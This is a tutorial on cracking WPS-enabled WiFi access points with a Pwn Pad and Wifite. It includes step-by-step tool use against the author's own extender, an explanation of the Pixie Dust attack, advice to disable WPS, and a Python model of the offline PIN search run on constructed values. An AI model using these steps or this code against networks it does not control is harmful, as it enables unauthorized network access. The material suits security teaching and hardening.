Cracking WiFi with PwnieExpress Pwn Pad and Wifite

This tutorial demonstrates how to use the Pwnie Express Pwn Pad and the Wifite tool to find WiFi access points and recover their passwords, specifically access points that have WPS (Wi-Fi Protected Setup) enabled. The WPA passphrase itself is never brute-forced: Wifite attacks the WPS PIN, and a recovered PIN hands over the passphrase through the WPS protocol.

THE INSTRUCTIONS AND INFORMATION CONTAINED WITHIN THIS DOCUMENT/PAGE/TUTORIAL ARE FOR EDUCATIONAL PURPOSES ONLY.  EXECUTING THESE INSTRUCTIONS ON ANY SYSTEM(S) AND/OR NETWORKS THAT YOU DO NOT FULLY OWN AND CONTROL IS VERY LIKELY ILLEGAL WHEREVER YOU LIVE AND YOU WILL BE BREAKING THE LAW IF YOU DO SO. DON’T BREAK THE LAW.

To complete this tutorial, you will need the following (the items this page uses; the exact models are not named on the page):

  1. A Pwnie Express Pwn Pad.
  2. The TP-Link USB wireless adapter that is used with the Pwn Pad.
  3. A USB OTG cable to connect the adapter to the Pwn Pad.
  4. A wireless network extender (or other WPS-enabled access point) that you own and control, to use as the target.

SETUP

  1. Make sure your wireless network extender is connected to your wireless network and fully functional. The setup depends on the make and model you purchased.
  2. Turn on the Pwn Pad first, with the TP-Link adapter disconnected.
  3. After the Pwn Pad has booted, connect the TP-Link adapter to the OTG USB cable as shown in the picture below.

    [Image: PWNIE-Back]

  4. With the adapter connected, the Pwn Pad presents a Home/Main screen similar to the one in the picture below.

    [Image: PWNIE-Home Screen]

SCANNING

  1. From the Pwn Pad Main screen, tap the “Wireless Tools” group icon, and then tap the Wifite icon.

    Note: Make sure the TP-Link USB adapter is connected to the Pwn Pad before you launch Wifite; it looks for the adapter at startup and will not find it if you plug it in afterwards.

    [Image: PWNIE-Wireless Tools]

  2. Wifite verifies that a wireless interface it can put into monitor mode is present and, if it finds one, launches in a terminal. As soon as it starts you will see a splash screen similar to the picture below, which quickly gives way to the list of WiFi access points it finds.

    [Image: PWNIE-Startup]

  3. The picture below shows the WiFi access points that Wifite found. You can let it run for a few minutes and walk around the area if you need a better signal; the list also shows which access points advertise WPS, which is what this tutorial targets. The access point we will be attacking is the Marina-2.4 one (the others are greyed out to protect the neighbors’ privacy).

    [Image: PWNIE-Found Wireless]

  4. When you are ready to target an access point, send CTRL+C to the running terminal to stop the scan. To do this on the Pwn Pad: tap anywhere in the terminal to bring up the keyboard, then hold your finger on the terminal until the special Options Menu appears, tap to send the Control key, and press C on the keyboard. Wifite then prompts for a target: enter the number of the access point you want (listed under the NUM column) and tap Enter on the keyboard.

    Note: Although the keyboard itself has a CTRL key, it doesn’t seem to work; use the Options Menu method above.

    [Image: PWNIE-Select Target]

RESULTS

  1. Wifite attempts several attacks in turn to recover the WiFi password. The wireless network extenders I tested were cracked within seconds, even though the passphrase in use looked “complex”. Passphrase strength is irrelevant here: the attack recovers the 8-digit WPS PIN, and the access point then discloses the WPA passphrase as part of the WPS exchange, whatever its length or character set.

    [Image: PWNIE-Found Password]

  2. The attack method that succeeds most often is the Pixie Dust attack (shown as “pixie” in Wifite’s output), based on the attack presented in 2014 by Dominique Bongard. “The attack only works on the default WPS implementation of several wireless chip makers, including Ralink, MediaTek, Realtek and Broadcom… and focuses on a lack of randomization when generating the E-S1 and E-S2 “secret” nonces. If the attacker can figure out those two nonces, they can crack the PIN within one minute and 30 seconds, depending on the device.” Because the PIN is recovered offline from a single captured WPS exchange, the access point’s WPS lockout (which is meant to slow down online PIN guessing) never triggers.
  3. Look up your device on WikiDevi. If it contains one of the chipsets listed above, disable WPS now. Treat the chipset list as a warning sign rather than an all-clear: other implementations may have their own nonce weaknesses, and any access point that accepts WPS PIN registration without an effective lockout is still exposed to the slower online PIN brute force, so disabling WPS is the right default whatever the chipset. If your device has no option to disable WPS (as is common with WiFi extenders) and no firmware update that adds one, unplug and disconnect it now.
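To make the “lack of randomization” concrete, here is an added worked example (not code from the page, from Wifite or from pixiewps) that models the relevant part of the WPS exchange in Python. The access point (enrollee) proves knowledge of the PIN by sending E-Hash1 and E-Hash2 in message M3, where each is HMAC-SHA256 over a secret nonce (E-S1 or E-S2), one half of the PIN and the two Diffie-Hellman public keys. If the nonces are predictable, an attacker who holds AuthKey (the registrar side of the exchange, which the attacker plays) can try every PIN half offline. The AuthKey, PKE and PKR values below are constructed placeholders; in a real attack they are derived from and captured in M1 to M3. The all-zero nonce models the Ralink behaviour named above; the random-nonce run shows the same attack failing against a correct implementation.

```python
import hashlib
import hmac
import os

# All keys and public values in demo() are constructed for this example. In a
# real Pixie Dust attack PKE, PKR, E-Hash1 and E-Hash2 come from the sniffed
# WPS M1/M2/M3 messages, and AuthKey is derived from the Diffie-Hellman
# exchange the attacker took part in as the (fake) registrar.


def wps_pin_checksum(pin7: int) -> int:
    """Return the 8th (check) digit of a WPS PIN given its first 7 digits.

    WPS checksum: digits are weighted 3,1,3,1,... from the right and the check
    digit brings the sum to a multiple of 10. Because this digit is derived,
    only 10^3 values of the second half of the PIN remain once the first half
    is known (10^4 + 10^3 guesses in total instead of 10^8).
    """
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def _psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII half of the PIN)."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]


def _ehash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3_hashes(authkey, pin, pke, pkr, es1, es2):
    """The two hashes the access point (enrollee) sends in M3.

    A correct implementation draws es1/es2 from a CSPRNG; a Pixie Dust
    vulnerable one uses values the attacker can predict (Ralink used zeros).
    """
    psk1 = _psk_half(authkey, pin[:4])
    psk2 = _psk_half(authkey, pin[4:])
    return _ehash(authkey, es1, psk1, pke, pkr), _ehash(authkey, es2, psk2, pke, pkr)


def pixie_dust_recover_pin(authkey, pke, pkr, ehash1, ehash2, es1_guess, es2_guess):
    """Offline PIN recovery for guessed nonces.

    At most 10^4 + 10^3 HMAC computations and no further frames to the AP,
    so the AP's WPS lockout never triggers. Returns None if the nonce guess
    does not reproduce E-Hash1, i.e. the AP is not vulnerable in this way.
    """
    first = None
    for n in range(10_000):
        cand = f"{n:04d}"
        if _ehash(authkey, es1_guess, _psk_half(authkey, cand), pke, pkr) == ehash1:
            first = cand
            break
    if first is None:
        return None
    for n in range(1_000):
        cand = f"{n:03d}"
        cand += str(wps_pin_checksum(int(first + cand)))  # derive the check digit
        if _ehash(authkey, es2_guess, _psk_half(authkey, cand), pke, pkr) == ehash2:
            return first + cand
    return None


def demo():
    """Attack a zero-nonce AP, then a properly random one, with the same guess."""
    authkey = hashlib.sha256(b"constructed AuthKey for the demo").digest()  # constructed
    pke = bytes([0x11]) * 192  # constructed stand-ins for the 1536-bit DH public keys
    pkr = bytes([0x22]) * 192
    pin = "12345670"  # a valid WPS PIN (check digit 0)
    zero = bytes(16)

    eh1, eh2 = enrollee_m3_hashes(authkey, pin, pke, pkr, zero, zero)
    recovered = pixie_dust_recover_pin(authkey, pke, pkr, eh1, eh2, zero, zero)

    eh1, eh2 = enrollee_m3_hashes(authkey, pin, pke, pkr, os.urandom(16), os.urandom(16))
    not_recovered = pixie_dust_recover_pin(authkey, pke, pkr, eh1, eh2, zero, zero)
    return recovered, not_recovered


if __name__ == "__main__":
    print(demo())  # ('12345670', None)
```

The whole search is a few thousand HMAC calls, which is why Wifite reports the PIN in seconds. Real tooling additionally has to reproduce the specific weak nonce generator of each chipset (zero, a weak LCG seeded from another nonce, a time-based seed); the example only models the simplest case, which is enough to show why passphrase complexity plays no part in the outcome.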

References:

  - Wi-Fi Protected Setup, Wikipedia: https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup
  - WPS Pixie Dust Attack (Offline WPS Attack), Kali Linux forums: https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
